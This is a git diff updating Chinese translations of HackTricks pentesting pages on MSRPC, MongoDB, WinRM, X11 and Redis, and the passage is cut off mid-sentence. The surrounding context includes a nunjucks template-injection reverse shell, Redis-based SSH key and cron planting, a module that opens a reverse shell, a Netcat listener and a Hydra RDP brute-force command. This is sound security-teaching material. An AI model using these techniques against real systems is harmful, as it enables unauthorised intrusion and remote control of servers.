-由客户端应用程序发起,MSRPC过程涉及调用本地存根过程,然后与客户端运行时库交互,以准备和传输请求到服务器。这包括将参数转换为标准网络数据表示格式。如果服务器是远程的,传输协议的选择由运行时库决定,确保RPC通过网络栈传递。 +由客户端应用程序发起,MSRPC过程涉及调用本地存根过程,然后与客户端运行时库交互,以准备并将请求传输到服务器。这包括将参数转换为标准网络数据表示格式。如果服务器是远程的,传输协议的选择由运行时库决定,确保RPC通过网络栈传递。 ![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png) ## **识别暴露的RPC服务** -通过查询RPC定位服务和各个端点,可以确定通过TCP、UDP、HTTP和SMB暴露的RPC服务。工具如rpcdump有助于识别唯一的RPC服务,以**IFID**值表示,揭示服务细节和通信绑定: +通过查询RPC定位服务和各个端点,可以确定通过TCP、UDP、HTTP和SMB暴露的RPC服务。工具如rpcdump有助于识别独特的RPC服务,以**IFID**值表示,揭示服务细节和通信绑定: ``` D:\rpctools> rpcdump [-p port] **IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 @@ -62,9 +62,9 @@ use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor rpcdump.py -p 135 ``` -所有选项除了 `tcp_dcerpc_auditor` 都是专门针对端口 135 上的 MSRPC 进行攻击设计的。 +所有选项除了 `tcp_dcerpc_auditor` 都是专门针对端口 135 上的 MSRPC。 -#### 知名 RPC 接口 +#### 显著的 RPC 接口 * **IFID**: 12345778-1234-abcd-ef00-0123456789ab * **命名管道**: `\pipe\lsarpc` @@ -95,7 +95,7 @@ rpcdump.py -p 135 使用 [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver),来自 [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/),可以滥用 _**ServerAlive2**_ 方法在 _**IOXIDResolver**_ 接口内。 -该方法已被用于从 HTB 盒子 _APT_ 获取接口信息,如 **IPv6** 地址。有关 0xdf APT 的详细信息,请参见 [这里](https://0xdf.gitlab.io/2021/04/10/htb-apt.html),其中包括使用来自 [Impacket](https://github.com/SecureAuthCorp/impacket/) 的 rpcmap.py 和 _stringbinding_ 的替代方法(见上文)。 +该方法已被用于从 HTB 盒子 _APT_ 获取接口信息作为 **IPv6** 地址。有关 0xdf APT 的详细信息,请参见 [这里](https://0xdf.gitlab.io/2021/04/10/htb-apt.html),它包括使用来自 [Impacket](https://github.com/SecureAuthCorp/impacket/) 的 rpcmap.py 的替代方法,使用 _stringbinding_(见上文)。 ### 使用有效凭据执行 RCE @@ -117,7 +117,7 @@ rpcdump.py -p 135 * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/) -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -133,16 +133,16 @@ rpcdump.py -p 135 **加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! {% hint style="success" %} -学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习和实践 AWS 黑客技术:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践 GCP 黑客技术:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
{% endhint %} diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index 8e9a466f5..a23b34b7e 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -9,13 +9,13 @@ 支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。 {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -28,11 +28,11 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! ## 基本信息 -**MongoDB** 是一个 **开源** 数据库管理系统,使用 **文档导向数据库模型** 来处理多种形式的数据。它为管理非结构化或半结构化数据提供了灵活性和可扩展性,适用于大数据分析和内容管理等应用。**默认端口:** 27017, 27018 +**MongoDB** 是一个 **开源** 数据库管理系统,使用 **文档导向数据库模型** 来处理多种形式的数据。它为管理大数据分析和内容管理等应用中的非结构化或半结构化数据提供了灵活性和可扩展性。**默认端口:** 27017, 27018 ``` PORT STATE SERVICE VERSION 27017/tcp open mongodb MongoDB 2.6.9 2.6.9 @@ -108,17 +108,17 @@ Mongo 对象 ID 是 **12 字节十六进制** 字符串: 3. 2500: 进程 ID 4. 314019: 增量计数器 -在上述元素中,机器标识符在数据库运行在同一物理/虚拟机上时将保持不变。进程 ID 仅在 MongoDB 进程重启时更改。时间戳每秒更新一次。通过简单地递增计数器和时间戳值来猜测对象 ID 的唯一挑战是 Mongo DB 在系统级别生成和分配对象 ID。 +在上述元素中,机器标识符在数据库运行在同一物理/虚拟机上时将保持不变。进程 ID 仅在 MongoDB 进程重启时更改。时间戳每秒更新。通过简单地递增计数器和时间戳值来猜测对象 ID 的唯一挑战是 Mongo DB 在系统级别生成和分配对象 ID。 工具 [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict),给定一个起始对象 ID(您可以创建一个帐户并获取起始 ID),它会返回大约 1000 个可能分配给下一个对象的对象 ID,因此您只需对它们进行暴力破解。 ## Post -如果您是 root,您可以 **修改** **mongodb.conf** 文件,以便不需要凭据(_noauth = true_)并且 **无需凭据登录**。 +如果您是 root,您可以 **修改** **mongodb.conf** 文件,以便不需要凭据(_noauth = true_)并 **无需凭据登录**。 *** -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -129,13 +129,13 @@ Mongo 对象 ID 是 **12 字节十六进制** 字符串: 通过实时新闻和见解,跟上快速变化的黑客世界 **最新公告**\ -了解最新的漏洞赏金启动和重要平台更新 +及时了解最新的漏洞赏金发布和重要平台更新 **加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! {% hint style="success" %} -学习和实践 AWS 黑客攻击:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习和实践 GCP 黑客攻击:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习与实践 AWS 黑客攻击:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习与实践 GCP 黑客攻击: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 8f223338d..bc930047f 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -15,7 +15,7 @@
{% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -32,14 +32,14 @@ ## WinRM -[Windows 远程管理 (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) 被微软强调为一种 **协议**,它通过 HTTP(S) 实现 **Windows 系统的远程管理**,并在此过程中利用 SOAP。它基本上由 WMI 提供支持,呈现为 WMI 操作的基于 HTTP 的接口。 +[Windows 远程管理 (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) 被微软强调为一种 **协议**,它通过 HTTP(S) 实现 **对 Windows 系统的远程管理**,并在此过程中利用 SOAP。它基本上由 WMI 提供支持,呈现为 WMI 操作的基于 HTTP 的接口。 -WinRM 在机器上的存在允许通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统中的工作方式。要确定 WinRM 是否正常运行,建议检查特定端口的开放情况: +机器上存在 WinRM 允许通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统中的工作方式。要确定 WinRM 是否正常运行,建议检查特定端口的开放情况: * **5985/tcp (HTTP)** * **5986/tcp (HTTPS)** -上述列表中的开放端口表示 WinRM 已被设置,从而允许尝试启动远程会话。 +上述列表中的开放端口表明 WinRM 已经设置,从而允许尝试启动远程会话。 ### **启动 WinRM 会话** @@ -48,7 +48,7 @@ WinRM 在机器上的存在允许通过 PowerShell 进行简单的远程管理 Enable-PSRemoting -Force Set-Item wsman:\localhost\client\trustedhosts * ``` -这种方法涉及在 `trustedhosts` 配置中添加通配符,这一步骤需要谨慎考虑其影响。还需要注意的是,可能需要将攻击者机器上的网络类型从“公共”更改为“工作”。 +这种方法涉及在 `trustedhosts` 配置中添加通配符,这一步骤需要谨慎考虑其影响。还需要注意的是,可能需要在攻击者的机器上将网络类型从“公共”更改为“工作”。 此外,可以使用 `wmic` 命令**远程激活** WinRM,示例如下: ```powershell @@ -58,7 +58,7 @@ wmic /node: process call create "powershell enable-psremoting -forc ### 测试是否已配置 -要验证攻击机器的设置,使用 `Test-WSMan` 命令检查目标是否正确配置了 WinRM。通过执行此命令,您应该期望收到有关协议版本和 wsmid 的详细信息,指示配置成功。以下是演示已配置目标与未配置目标预期输出的示例: +要验证攻击机器的设置,可以使用 `Test-WSMan` 命令检查目标是否正确配置了 WinRM。通过执行此命令,您应该期望收到有关协议版本和 wsmid 的详细信息,指示配置成功。以下是演示已配置目标与未配置目标预期输出的示例: * 对于一个 **已** 正确配置的目标,输出将类似于: ```bash @@ -68,7 +68,7 @@ Test-WSMan ![](<../.gitbook/assets/image (582).png>) -* 相反,对于**未**配置WinRM的目标,将不会返回此类详细信息,突显出缺乏适当的WinRM设置。 +* 相反,对于**未**配置WinRM的目标,将不会返回如此详细的信息,突显出缺乏适当的WinRM设置。 ![](<../.gitbook/assets/image (458).png>) @@ -123,7 +123,7 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New ``` ### 保存和恢复会话 -这 **将不起作用** 如果远程计算机中的 **语言** 被 **限制**。 +如果远程计算机中的**语言**受到**限制**,则此**将不起作用**。 ```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force @@ -150,7 +150,7 @@ Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 winrm quickconfig winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ``` -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -163,7 +163,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶级黑客开始合作! +**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! ## 在Linux中连接WinRM @@ -263,7 +263,7 @@ end * `port:5985 Microsoft-HTTPAPI` -## 参考 +## References * [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) @@ -304,7 +304,9 @@ Name: Hydra Brute Force Description: Need User Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} ``` -
+​ + +
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -329,7 +331,7 @@ Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! * **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。 +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。 {% endhint %} diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 28bfd8435..24da1d93d 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -15,7 +15,7 @@ {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -141,7 +141,7 @@ msf> use exploit/unix/x11/x11_keyboard_exec ``` 其他方式: -**反向Shell:** Xrdp还允许通过Netcat获取反向Shell。输入以下命令: +**反向Shell:** Xrdp 还允许通过 Netcat 获取反向 shell。输入以下命令: ```bash ./xrdp.py \ –no-disp ``` @@ -151,7 +151,7 @@ msf> use exploit/unix/x11/x11_keyboard_exec ```bash nc -lvp 5555 ``` -然后,将您的 IP 地址和端口放入 **R-Shell** 选项中,然后点击 **R-shell** 以获取 shell +然后,将您的IP地址和端口放入**R-Shell**选项中,然后点击**R-shell**以获取一个shell ## 参考文献 @@ -163,9 +163,9 @@ nc -lvp 5555 * `port:6000 x11` -
+
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! +加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和漏洞赏金猎人交流! **黑客见解**\ 参与深入探讨黑客的刺激与挑战的内容 @@ -179,16 +179,16 @@ nc -lvp 5555 **加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! {% hint style="success" %} -学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习与实践AWS黑客攻击:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习与实践GCP黑客攻击:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte)
-支持 HackTricks +支持HackTricks -* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord小组**](https://discord.gg/hRep4RUj7f)或[**电报小组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR来分享黑客技巧。
{% endhint %} diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index aa26319fa..02e055144 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -1,8 +1,8 @@ # 6379 - Pentesting Redis {% hint style="success" %} -学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -15,7 +15,7 @@
{% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -28,7 +28,7 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们,进入** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! ## 基本信息 @@ -52,7 +52,7 @@ msf> use auxiliary/scanner/redis/redis_server ### 横幅 -Redis 是一个 **基于文本的协议**,你可以直接 **在套接字中发送命令**,返回的值将是可读的。还要记住,Redis 可以使用 **ssl/tls** 运行(但这很奇怪)。 +Redis 是一个 **基于文本的协议**,你可以直接 **在套接字中发送命令**,返回的值将是可读的。还要记住,Redis 可以使用 **ssl/tls** 运行(但这很少见)。 在一个常规的 Redis 实例中,你可以直接使用 `nc` 连接,或者你也可以使用 `redis-cli`: ```bash @@ -63,25 +63,25 @@ redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools ``` -NOAUTH Authentication required. ``` -在这种情况下,这意味着**您需要有效的凭据**才能访问Redis实例。 +在这种情况下,这意味着 **您需要有效的凭据** 来访问 Redis 实例。 -### Redis身份验证 +### Redis 认证 -**默认情况下**,Redis可以**不需要凭据**进行访问。然而,它可以被**配置**为仅支持**密码或用户名 + 密码**。\ -可以在_**redis.conf**_文件中使用参数`requirepass`**设置密码**,**或临时**,直到服务重启,连接到它并运行:`config set requirepass p@ss$12E45`。\ -此外,可以在_**redis.conf**_文件中的参数`masteruser`中配置**用户名**。 +**默认情况下** Redis 可以 **不需要凭据** 进行访问。然而,它可以被 **配置** 为仅支持 **密码,或用户名 + 密码**。\ +可以在 _**redis.conf**_ 文件中使用参数 `requirepass` **设置密码**,**或临时** 直到服务重启,连接到它并运行:`config set requirepass p@ss$12E45`。\ +此外,可以在 _**redis.conf**_ 文件中的参数 `masteruser` 中配置 **用户名**。 {% hint style="info" %} -如果仅配置了密码,则使用的用户名是"**default**"。\ -另外,请注意**无法从外部找到**Redis是否仅配置了密码或用户名+密码。 +如果仅配置了密码,则使用的用户名是 "**default**"。\ +另外,请注意 **没有办法从外部找到** Redis 是否仅配置了密码或用户名+密码。 {% endhint %} -在这种情况下,您将**需要找到有效的凭据**以与Redis进行交互,因此您可以尝试[**暴力破解**](../generic-methodologies-and-resources/brute-force.md#redis)。\ -**如果您找到了有效的凭据,您需要在建立连接后使用以下命令进行身份验证**: +在这种情况下,您将 **需要找到有效的凭据** 来与 Redis 交互,因此您可以尝试 [**暴力破解**](../generic-methodologies-and-resources/brute-force.md#redis)。\ +**如果您找到了有效的凭据,您需要在建立连接后使用以下命令进行会话认证**: ```bash AUTH ``` -**有效凭据**将会返回: `+OK` +**有效凭据**将会返回:`+OK` ### **认证枚举** @@ -100,7 +100,7 @@ CONFIG GET * ``` rename-command FLUSHDB "" ``` -有关安全配置Redis服务的更多信息,请访问:[https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) +有关如何安全配置Redis服务的更多信息,请访问:[https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) 您还可以使用命令**`monitor`**实时**监控执行的Redis命令**,或使用**`slowlog get 25`**获取**25个最慢的查询**。 @@ -108,7 +108,7 @@ rename-command FLUSHDB "" ### **转储数据库** -在Redis中,**数据库是从0开始的数字**。您可以在命令`info`的“Keyspace”部分的输出中找到是否有人在使用: +在Redis中,**数据库是从0开始的数字**。您可以在命令`info`的输出中找到是否有人在“Keyspace”块中使用: ![](<../.gitbook/assets/image (766).png>) @@ -116,7 +116,7 @@ rename-command FLUSHDB "" ``` INFO keyspace ``` -在该示例中,**数据库 0 和 1** 正在使用中。**数据库 0 包含 4 个键,数据库 1 包含 1 个**。默认情况下,Redis 将使用数据库 0。为了导出例如数据库 1,您需要执行: +在这个例子中,**数据库 0 和 1** 正在被使用。**数据库 0 包含 4 个键,而数据库 1 包含 1 个**。默认情况下,Redis 将使用数据库 0。为了导出例如数据库 1,您需要执行: ```bash SELECT 1 [ ... Indicate the database ... ] @@ -125,7 +125,7 @@ KEYS * GET [ ... Get Key ... ] ``` -在运行 `GET ` 时,如果出现以下错误 `-WRONGTYPE Operation against a key holding the wrong kind of value`,这可能是因为该键的类型不是字符串或整数,需要使用特殊操作符来显示它。 +如果在运行 `GET ` 时出现以下错误 `-WRONGTYPE Operation against a key holding the wrong kind of value`,这可能是因为该键的类型不是字符串或整数,并且需要特殊操作符来显示它。 要知道键的类型,请使用 `TYPE` 命令,下面是列表和哈希键的示例。 ```bash @@ -141,11 +141,11 @@ DUMP ``` **使用 npm 导出数据库**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **或 python** [**redis-utils**](https://pypi.org/project/redis-utils/) -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! -**黑客见解**\ +**黑客洞察**\ 参与深入探讨黑客的刺激与挑战的内容 **实时黑客新闻**\ @@ -178,13 +178,13 @@ OK 10.85.0.52:6379> save OK ``` -​如果 webshell 访问异常,您可以在备份后清空数据库并重试,记得恢复数据库。 +如果 webshell 访问异常,您可以在备份后清空数据库并重试,记得恢复数据库。 ### 模板 Webshell 与前一节一样,您还可以覆盖一些将被模板引擎解释的 html 模板文件,从而获得 shell。 -例如,按照 [**这篇文章**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/),您可以看到攻击者在 **nunjucks 模板引擎** 解释的 **html** 中注入了一个 **rev shell:** +例如,遵循 [**这篇文章**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/),您可以看到攻击者在 **nunjucks 模板引擎** 解释的 **html 中注入了 rev shell:** ```javascript {{ ({}).constructor.constructor( "var net = global.process.mainModule.require('net'), @@ -199,19 +199,19 @@ sh.stderr.pipe(client); )()}} ``` {% hint style="warning" %} -注意 **多个模板引擎会将** 模板缓存到 **内存中**,因此即使你覆盖了它们,新的模板也 **不会被执行**。在这种情况下,要么开发者保持了自动重载的状态,要么你需要对服务进行 DoS 攻击(并期望它会自动重新启动)。 +注意,**多个模板引擎会将**模板缓存到**内存**中,因此即使您覆盖它们,新的模板也**不会被执行**。在这种情况下,开发人员要么保持自动重载处于活动状态,要么您需要对服务进行DoS攻击(并期望它会自动重新启动)。 {% endhint %} ### SSH 示例 [来自这里](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) -请注意 **`config get dir`** 的结果可能会在其他手动利用命令后发生变化。建议在登录 Redis 后立即运行它。在 **`config get dir`** 的输出中,你可以找到 **redis 用户** 的 **家目录**(通常是 _/var/lib/redis_ 或 _/home/redis/.ssh_),知道这一点后,你就知道可以在哪里写入 `authenticated_users` 文件以通过 ssh **以 redis 用户身份** 访问。如果你知道其他有效用户的家目录并且你有可写权限,你也可以利用它: +请注意,**`config get dir`** 的结果在其他手动利用命令后可能会改变。建议在登录Redis后立即运行它。在**`config get dir`** 的输出中,您可以找到**redis用户**的**主目录**(通常是 _/var/lib/redis_ 或 _/home/redis/.ssh_),知道这一点后,您就知道可以在哪里写入 `authenticated_users` 文件以通过 **redis用户** 进行ssh访问。如果您知道其他有效用户的主目录并且您有可写权限,您也可以利用它: -1. 在你的电脑上生成一个 ssh 公私钥对:**`ssh-keygen -t rsa`** +1. 在您的电脑上生成一个ssh公钥-私钥对:**`ssh-keygen -t rsa`** 2. 将公钥写入文件:**`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** -3. 将文件导入 redis:**`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** -4. 将公钥保存到 redis 服务器上的 **authorized\_keys** 文件中: +3. 将文件导入redis:**`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** +4. 将公钥保存到redis服务器上的**authorized\_keys**文件中: ``` root@Urahara:~# redis-cli -h 10.85.0.52 @@ -222,7 +222,7 @@ OK 10.85.0.52:6379> save OK ``` -5. 最后,你可以使用私钥 **ssh** 连接到 **redis 服务器**:**ssh -i id\_rsa redis@10.85.0.52** +5. 最后,您可以使用私钥**ssh**到**redis服务器**:**ssh -i id\_rsa redis@10.85.0.52** **此技术在这里自动化:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) @@ -237,16 +237,16 @@ OK root@Urahara:~# redis-cli -h 10.85.0.52 save OK ``` -最后一个示例适用于 Ubuntu,对于 **Centos**,上述命令应为:`redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` +The last example is for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` -此方法也可以用来赚取比特币:[yam](https://www.v2ex.com/t/286981#reply14) +这种方法也可以用来赚取比特币:[yam](https://www.v2ex.com/t/286981#reply14) -### 加载 Redis 模块 +### Load Redis Module -1. 按照 [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) 的说明,您可以 **编译一个 redis 模块以执行任意命令**。 -2. 然后您需要某种方式来 **上传编译好的** 模块。 -3. **在运行时加载上传的模块**,使用 `MODULE LOAD /path/to/mymodule.so` -4. **列出已加载的模块**,以检查是否正确加载:`MODULE LIST` +1. 按照 [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) 的说明,你可以 **编译一个 redis 模块以执行任意命令**。 +2. 然后你需要某种方式来 **上传编译好的** 模块。 +3. **在运行时加载上传的模块**,使用 `MODULE LOAD /path/to/mymodule.so`。 +4. **列出已加载的模块** 以检查它是否正确加载:`MODULE LIST`。 5. **执行** **命令**: ``` @@ -256,19 +256,19 @@ OK "root\n" 127.0.0.1:6379> system.rev 127.0.0.1 9999 ``` -6. 随时卸载模块:`MODULE UNLOAD mymodule` +6. 随时卸载模块:`MODULE UNLOAD mymodule`。 -### LUA 沙箱绕过 +### LUA sandbox bypass -[**这里**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) 您可以看到 Redis 使用命令 **EVAL** 来执行 **沙箱中的 Lua 代码**。在链接的帖子中,您可以看到 **如何滥用它** 使用 **dofile** 函数,但 [显然](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) 这不再可能。无论如何,如果您可以 **绕过 Lua** 沙箱,您可以 **在系统上执行任意** 命令。此外,从同一帖子中,您可以看到一些 **导致 DoS 的选项**。 +[**这里**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) 你可以看到 Redis 使用命令 **EVAL** 来执行 **Lua 